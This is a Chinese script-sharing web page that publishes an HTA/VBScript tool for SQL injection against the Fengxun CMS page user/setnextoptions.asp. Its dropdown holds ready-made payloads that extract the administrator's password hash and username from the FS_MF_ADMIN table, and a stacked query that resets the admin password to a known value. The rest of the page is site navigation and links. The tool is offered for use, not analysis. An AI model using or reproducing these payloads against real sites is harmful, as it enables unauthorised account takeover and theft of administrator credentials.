首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

风讯注入exp(hta版)代码发布

所属分类: 脚本专栏 / hta 阅读数: 626
收藏 0 赞 0 分享
<SCRIPT LANGUAGE="VBScript">
Sub Window_onLoad
    window.resizeTo 450,380
    window.moveTo 300, 300
End Sub 
</SCRIPT>

<SCRIPT LANGUAGE="VBScript">
Function getHTTPPage(Path)
       t = GetBody(Path)
       getHTTPPage = BytesToBstr(t, "GB2312")
      document.getElementById("url").innerText=getHTTPPage
End Function
</script>
<SCRIPT LANGUAGE="VBScript">
Function GetBody(url)
      On Error Resume Next
      Set Retrieval = CreateObject("Microsoft.XMLHTTP")
      With Retrieval
          .Open "Get", url, False, "", ""
          .Send
           GetBody = .ResponseBody
      End With
      Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
      Dim objstream
      Set objstream = CreateObject("adodb.stream")
       objstream.Type = 1
       objstream.Mode = 3
       objstream.Open
       objstream.Write Body
       objstream.Position = 0
       objstream.Type = 2
       objstream.Charset = Cset
       BytesToBstr = objstream.ReadText
       objstream.Close
      Set objstream = Nothing
End Function

</script>

<title>by lcx</title>
<input id="urlcode" NAME="urlcode" size="60" value="http://风讯url/user/setnextoptions.asp">
<select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)>
<option value="">风讯sql版注入,至于其它备份shell的语句懒得写了</option>
<option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option>
<option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option>
<option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word='a0b923820dcc509a' where id=1--">更改管理员密码为1</option>
</select>
<TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA>
更多精彩内容其他人还在看

用来猜后台的HTA小程序

虽然文件时用来猜后台地址的程序,但里面的代码确实值得我们参考学习
收藏 0 赞 0 分享

用hta做的好玩的小程序(固定在桌面)

好玩的小程序 用hta做的,运行后就固定在桌面了
收藏 0 赞 0 分享

用hta实现的远程桌面连接脚本

用hta实现的远程桌面连接效果的脚本,需要事先在hta中填好ip,端口等信息,当然你也可以自己修改下,可以输入ip端口的
收藏 0 赞 0 分享

如何使一个HTA位于屏幕中心(Win32_DesktopMonitor)

我们可以调整(如果需要)窗口大小并使其居中,但这样做时会在屏幕上出现瞬间的闪烁。这并不是太明显,其实际结果就是你所期望的:HTA 会位于屏幕中心
收藏 0 赞 0 分享

hta 实现的五子棋界面

这篇文章主要介绍了hta 实现的五子棋界面,需要的朋友可以参考下
收藏 0 赞 0 分享

运行程序的hta

运行程序的hta
收藏 0 赞 0 分享

个人学习之作 hta 原创

这个hta是基于asp操作access数据库实现的,方便存储个人学习资料的一个东西,也是脚本之家的雏形,好不容易找到了备份,希望大家能喜欢
收藏 0 赞 0 分享

NCC Tools(never code counter tools) V1.0.1发布代码-代码统计工具

NCC Tools(never code counter tools) V1.0.1发布代码-代码统计工具
收藏 0 赞 0 分享

XMLHttps

XMLHttps
收藏 0 赞 0 分享

网易手机图片自由下载器(hta)

网易手机图片自由下载器(hta)
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22